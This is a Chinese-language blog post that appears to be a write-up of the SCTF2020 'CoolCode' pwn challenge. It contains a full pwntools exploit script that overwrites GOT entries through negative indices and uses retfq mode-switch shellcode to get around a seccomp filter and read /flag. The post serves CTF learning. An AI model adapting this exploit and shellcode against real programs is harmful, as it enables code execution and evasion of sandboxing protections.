fa-fw"></i> <span id="run_time_day"> <i class="fas fa-spinner fa-pulse"></i> </span>天 <span id="run_time_hour"> <i class="fas fa-spinner fa-pulse"></i> </span>时 <span id="run_time_minute"> <i class="fas fa-spinner fa-pulse"></i> </span>分 <span id="run_time_second"> <i class="fas fa-spinner fa-pulse"></i> </span>秒 <script> setInterval(function (d,h,m,s,b) { function setzero(i) { return i < 10 ? "0" + i : i; } let BirthDay = new Date(b); let today = new Date(); let timeold = (today.getTime() - BirthDay.getTime()); let sectimeold = timeold / 1000; let secondsold = Math.floor(sectimeold); let msPerDay = 24 * 60 * 60 * 1000; let e_daysold = timeold / msPerDay; let daysold = Math.floor(e_daysold); let e_hrsold = (e_daysold - daysold) * 24; let hrsold = Math.floor(e_hrsold); let e_minsold = (e_hrsold - hrsold) * 60; let minsold = Math.floor((e_hrsold - hrsold) * 60); let seconds = Math.floor((e_minsold - minsold) * 60); d.textContent = daysold; h.textContent = setzero(hrsold); m.textContent = setzero(minsold); s.textContent = setzero(seconds); }, 1000, document.getElementById("run_time_day"), document.getElementById("run_time_hour"), document.getElementById("run_time_minute"), document.getElementById("run_time_second"), "10/27/2019 00:00:00")// 这是我第一篇CSDN博客的时间 </script></div><div><div> <i class="fas fa-eye fa-fw"></i> <span id="busuanzi_value_page_pv"> <i class="fas fa-spinner fa-pulse"></i> </span>次</div><div> <i class="fas fa-paw fa-fw"></i> <span id="busuanzi_value_site_pv"> <i class="fas fa-spinner fa-pulse"></i> </span>枚</div><div> <i class="fas fa-user-friends fa-fw"></i> <span id="busuanzi_value_site_uv"> <i class="fas fa-spinner fa-pulse"></i> </span>人</div><script src='https://cdn.jsdelivr.net/npm/busuanzi@2.3.0' async='async' ></script></div><div> <i class="fas fa-thumbs-up fa-fw"></i> <a href="https://jekyll-theme-WuK.wu-kan.cn"> jekyll-theme-WuK </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://aidaip.github.io"> AiDai </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://coinc1dens.github.io/"> Coin哥哥 </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://www.freejishu.com/"> freejishu的美丽世界 </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://hitcxy.com"> pikachu's Blog </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://n0vice.gitee.io/"> N0vice </a></div><div> <i class="fa fa-users fa-fw"></i> <a href="https://phuker.github.io/"> 腾汛新闻 </a></div><div> <i class="fas fa-copyright fa-fw"></i> 2019-2021 Surager</div></div></div><!-- Wrap is the content to shift when toggling the sidebar. We wrap the content to avoid any CSS collisions with our real content. --><div class="wrap"><style> pre { max-height: 66.6vh; overflow: auto; }</style><style> .container { min-width: 66.6%; }</style><style> .container.content { padding-top: 1rem; padding-bottom: 1px; margin-top: 1.5rem; margin-bottom: 1.5rem; border-radius:10px; box-shadow:0px 0px 0px 3px #bb0a0a, 0px 0px 0px 6px #2e56bf, 0px 0px 0px 9px #ea982e; background-color: rgba(255,255,255,0.95); animation-duration: 2s; animation-name: fadeIn; } .masthead{ padding-top: 1rem; padding-bottom: 1rem; margin-bottom: 1.5rem; box-shadow: 0 0 5rem rgba(0, 0, 0, 0.1); background-color: rgba(255,255,255,0.99); animation-duration: 2s; animation-name: fadeIn; } @keyframes fadeIn { from { opacity: 0; } to { opacity: 1; } }</style><div class="container content"><div class="page"><div class="post"> <span class="post-date"> <i class="fas fa-calendar-day fa-fw"></i> Time: 2020-07-08 <i class="fas fa-tag fa-fw"></i> Tags: binary and Writesup <br/> <i class="fas fa-link fa-fw"></i> Link: <a href="/_posts/2020-07-08-%E4%BB%8ESCTF2020_CoolCode%E4%B8%AD%E5%AD%A6%E4%B9%A0open%E7%A6%81%E7%94%A8%E7%9A%84seccomp%E7%BB%95%E8%BF%87/"> 从SCTF2020_CoolCode中学习open禁用的seccomp绕过 </a> </span><h2 id="seccomp禁用execve和open的情况">seccomp禁用execve和open的情况</h2><p>一般会留一个5号系统调用。</p><pre><code>0004: 0x15 0x01 0x00 0x00000005  if (A == fstat) goto 0006
</code></pre><p>在64位运行模式下的<code>sys_fstat</code>，在32位运行模式下是<code>sys_open</code>。</p><p>解决方案是利用shellcode<code>retfq</code>进行模式转换。<code>retfq</code>相当于<code>jmp rsp</code>的同时<code>mov cs,[rsp+0x8]</code>。cs寄存器中0x23表示32位运行模式，0x33表示64位运行模式。在写shellcode的时候在栈中布置好即可。</p><h2 id="程序分析">程序分析</h2><p>文件保护机制</p><pre><code>$ file ./CoolCode
./CoolCode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=63ae47b78d82eb9066b985cd3daf02452cd65895, stripped
$ checksec ./CoolCode
[*] '/home/surgaer/work/CoolCode'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments
</code></pre><p>几乎只开了canary，疯狂暗示。</p><p>但是没有这么简单，直接给了一个<code>seccomp</code>，禁用一大堆。只剩了<code>write</code>、<code>read</code>、<code>mmap</code>和<code>fstat</code>。</p><pre><code>=================================
 0000: 0x20 0x00 0x00 0x00000000  A = sys_number
 0001: 0x15 0x04 0x00 0x00000001  if (A == write) goto 0006
 0002: 0x15 0x03 0x00 0x00000000  if (A == read) goto 0006
 0003: 0x15 0x02 0x00 0x00000009  if (A == mmap) goto 0006
 0004: 0x15 0x01 0x00 0x00000005  if (A == fstat) goto 0006
 0005: 0x06 0x00 0x00 0x00050005  return ERRNO(5)
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x06 0x00 0x00 0x00000000  return KILL
</code></pre><p>参考师傅们的WP，解决方案是利用retfq切换机器运行模式到32位。</p><blockquote><p>32位的系统调用<code>5 : sys_open</code>，64位系统调用<code>5 : sys_fstat</code>。</p></blockquote><p>向chunk中输入信息时有信息检测，需要是数字或者大写字母。</p><pre><code class="language-c">if ( waf(s, v8) )
  {
    puts("read error.");
    exit(1);
}
strncpy(dest, s, v8);
...
}

signed __int64 __fastcall waf(__int64 a1, int a2)
{
  int i; // [rsp+14h] [rbp-8h]

  for ( i = 0; i &lt; a2 - 1; ++i )
  {
    if ( (*(i + a1) &lt;= 0x2F || *(i + a1) &gt; 0x39) &amp;&amp; (*(i + a1) &lt;= 0x40 || *(i + a1) &gt; 0x5A) )
      return 1LL;
  }
  return 0LL;
}
</code></pre><p>而可以利用<code>add</code>函数没有下界检测，可以输入负数覆盖<code>got</code>表的漏洞进行解决。解决方案是将<code>exit_got</code>改成<code>ret</code>。从而绕过检测。</p><pre><code class="language-python">add(-22,'\xc3') # asm('ret')
</code></pre><p>再覆盖<code>free_got</code>为<code>shellcode_read</code>，获得大量的字符输入权。</p><pre><code class="language-python">shellcode2 = '''
dec rdi
mov rdx,rsi
mov rax,rdi
syscall
ret
'''
add(-3,'1'*8)
add(1,'1'*8)
add(-3,'1'*8)
add(1,'1'*8)
add(-3,'1'*8)
add(-34,asm(shellcode2,arch='amd64')) # overwrite free_got
</code></pre><p>这样就可以写任意的字符了，但是由于<code>strncpy</code>函数的存在，<code>"\x00"</code>还是不行。况且我们并没有足够的字节数进行<code>shellcode</code>的写入。解决方案是将<code>write_got</code>写成<code>read</code>，就可以用<code>show</code>函数进行写了。</p><pre><code class="language-python">shellcode2 = '''
dec rdi
mov rdx,rsi
mov rax,rdi
syscall
ret
'''
add(-3,'1'*8)
add(1,'1'*8)
add(-3,'1'*8)
add(1,'1'*8)
add(-3,'1'*8)
add(-34,asm(shellcode2,arch='amd64')) # overwrite write_got
show(0)
</code></pre><p>此时我们只需向两个位置写入<code>shellcode</code>，再用<code>retfq</code>进行一个跳转即可。</p><pre><code class="language-python">shellcode3 = '''
xor rdi,rdi
mov rsi,0x602300
mov rdx,0x200
xor rax,rax
syscall
xor rdi,rdi
xor rax,rax
mov rsi,0x602400
mov rdx,0x200
syscall
push 0x23
push 0x602308
retfq
'''
padding = 'a'*0x20+p64(0)+p64(0x31)
payload = padding*2+asm(shellcode3,arch='amd64')
io.sendline(payload)
free(2)
flag = '/flag\x00\x00\x00'
shellcode_open = '''
xor eax,eax
mov eax,0x5
mov ebx,0x602300
mov ecx,0
int 0x80
jmp 0x33:0x602400
ret
'''
shellcode_write = '''
mov rdi,3
mov rsi,0x602500
mov rdx,0x200
xor rax,rax
syscall
mov rax,1
mov rdi,1
mov rsi,0x602500
mov rdx,0x200
syscall
ret
'''
io.sendline(flag+asm(shellcode_open,arch='i386'))
io.sendline(asm(shellcode_write,arch='amd64'))
</code></pre><h3 id="思路">思路</h3><ol><li>覆盖<code>exit_got</code>成<code>ret</code>，获得字符输入权限。<li>覆盖<code>free_got</code>为<code>shellcode_read</code>，获得大量的字符输入权。<li>覆盖<code>write_got</code>成<code>shellcode_read</code>，获得随机字符随机字符数输入权限。<li>将<code>free_got</code>上的指针所指<code>chunk</code>内容覆盖为<code>shellcode_read</code>，读入两段<code>shellcode</code>并且完成运行模式的转换。<li>发送<code>shellcode</code>，完成<code>orw</code>。</ol><h3 id="exp">exp</h3><pre><code class="language-python">from pwn import *
io = process("./CoolCode")
#io = remote("")
elf = ELF("./CoolCode")
libc = ELF("./x64-libc-2.23.so")
#context.log_level = 'debug'

def add(idx,con):
    io.sendlineafter(" Your choice :",'1')
    io.sendlineafter("Index:",str(idx))
    io.sendafter("messages:",con)

def free(idx):
    io.sendlineafter(" Your choice :",'3')
    io.sendlineafter("Index:",str(idx))

def show(idx):
    io.sendlineafter(" Your choice :",'2')
    io.sendlineafter("Index:",str(idx))

def dbg():
    gdb.attach(io)
    pause()

breakpoint = '''
define fn
b *0x400E61
b *0x400EF5
end
fn
'''
#gdb.attach(io,breakpoint)
add(-22,'\xc3') # asm('ret')
shellcode1 = '''
mov rsi,rdi
mov rdx,rdi
xor rdi,rdi
xor rax,rax
syscall
ret
'''
add(0,'1'*8)
add(-3,'1'*8)
add(-37,asm(shellcode1,arch='amd64')) # overwrite exit_got
shellcode2 = '''
dec rdi
mov rdx,rsi
mov rax,rdi
syscall
ret
'''
add(-3,'1'*8)
add(1,'1'*8)
add(-3,'1'*8)
add(1,'1'*8)
add(-3,'1'*8)
add(-34,asm(shellcode2,arch='amd64')) # overwrite write_got
show(0)
shellcode3 = '''
xor rdi,rdi
mov rsi,0x602300
mov rdx,0x200
xor rax,rax
syscall
xor rdi,rdi
xor rax,rax
mov rsi,0x602400
mov rdx,0x200
syscall
push 0x23
push 0x602308
retfq
'''
padding = 'a'*0x20+p64(0)+p64(0x31)
payload = padding*2+asm(shellcode3,arch='amd64')
io.sendline(payload)
free(2)
flag = '/flag\x00\x00\x00'
shellcode_open = '''
xor eax,eax
mov eax,0x5
mov ebx,0x602300
mov ecx,0
int 0x80
jmp 0x33:0x602400
ret
'''
shellcode_write = '''
mov rdi,3
mov rsi,0x602500
mov rdx,0x200
xor rax,rax
syscall
mov rax,1
mov rdi,1
mov rsi,0x602500
mov rdx,0x200
syscall
ret
'''
io.sendline(flag+asm(shellcode_open,arch='i386'))
#pause()
io.sendline(asm(shellcode_write,arch='amd64'))
io.interactive()
</code></pre><p>参考W&amp;M战队WP</p><p><a href="http://url.cn/UIeS07hx">SCTF2020 Writeup By W&amp;M（PWN和Crypto部分）</a></p><h2 id="总结">总结</h2><p>一开始这一题没有思路，原因可能是跳过了<code>checksec</code>的环节导致<code>RWX</code>以及<code>NX</code>没有发现，进而无法得到程序的控制流。</p><p>其次是<code>shellcode</code>的编写。通过这一题对自己的<code>shellcode</code>的编写能力有了一定的提升。</p><p>最后，在比赛上我总是怂的一批。记住，在比赛时一定不要怂。</p><p><img src="\assets\CoolCode\qinaidereaide1.jpg" alt="qinaidereaide1" /></p></div><div id="disqus_thread"></div><script> (function() { var d = document, s = d.createElement('script'); s.src = 'https://surager-pub.disqus.com/embed.js'; s.setAttribute('data-timestamp', +new Date()); (d.head || d.body).appendChild(s); })(); </script> <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript> <script> (function($){ setInterval(() => { $.each($('iframe'), (arr,x) => { let src = $(x).attr('src'); if (src && src.match(/(ads-iframe)|(disqusads)/gi)) { $(x).remove(); } }); }, 300); })(jQuery); </script> <br/> <i class="fas fa-coffee fa-fw"></i> <a href="/comments/">如果这篇博客帮助到你，可以留言夸夸我~</a> <br/> <i class="fab fa-creative-commons-by fa-fw"></i> <a href="https://creativecommons.org/licenses/by-nc/4.0/deed.zh" rel="license"> CC BY-NC 4.0 </a> （除特别声明或转载文章外）</div></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css" /><style> .katex-display>.katex { white-space: normal; }</style><script src="https://cdn.jsdelivr.net/combine/npm/katex@0.12.0/dist/katex.min.js,npm/katex@0.12.0/dist/contrib/auto-render.min.js" async="async" onload='renderMathInElement(document.body, { delimiters: [{left: "$$", right: "$$", display: true}, { left: "$", right: "$", display: false }, {left: "\\(", right: "\\)", display: false}, {left: "\\[", right: "\\]", display: true}]})' ></script><style> pre.language-mermaid, code.language-mermaid { display: none; } .mermaid { overflow: auto auto; max-width: 100%; max-height: 66.6vh; }</style><script src="https://cdn.jsdelivr.net/npm/mermaid@8.8.3/dist/mermaid.min.js" async="async" onload=' for(let x of document.getElementsByClassName("language-mermaid")) if(x.nodeName=="CODE") { let m = document.createElement("div"); m.classList.add("mermaid"); m.textContent = x.textContent; x.parentNode.insertAdjacentElement("beforebegin", m); }' ></script><link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/npm/prismjs@1.21.0/plugins/line-numbers/prism-line-numbers.min.css,npm/prismjs@1.21.0/plugins/toolbar/prism-toolbar.min.css,npm/prismjs@1.21.0/plugins/match-braces/prism-match-braces.min.css,npm/prism-themes@1.4.0/themes/prism-nord.min.css" /> <script src="https://cdn.jsdelivr.net/combine/npm/prismjs@1.21.0/components/prism-core.min.js,npm/prismjs@1.21.0/plugins/autoloader/prism-autoloader.min.js,npm/prismjs@1.21.0/plugins/line-numbers/prism-line-numbers.min.js,npm/prismjs@1.21.0/plugins/toolbar/prism-toolbar.min.js,npm/prismjs@1.21.0/plugins/match-braces/prism-match-braces.min.js" async="async" data-autoloader-path="https://cdn.jsdelivr.net/npm/prismjs@1.21.0/components/" onload=' for(let x of document.getElementsByClassName("content")) x.classList.add("line-numbers","match-braces"); Prism.plugins.toolbar.registerButton("select-code", function (env) { let button = document.createElement("button"); button.textContent = "select this " + env.language; button.addEventListener("click", function () { if (document.body.createTextRange) { let range = document.body.createTextRange(); range.moveToElementText(env.element); range.select(); } else if (window.getSelection) { let selection = window.getSelection(); let range = document.createRange(); range.selectNodeContents(env.element); selection.removeAllRanges(); selection.addRange(range); } }); return button; })' ></script></div><label for="sidebar-checkbox" class="sidebar-toggle"></label>
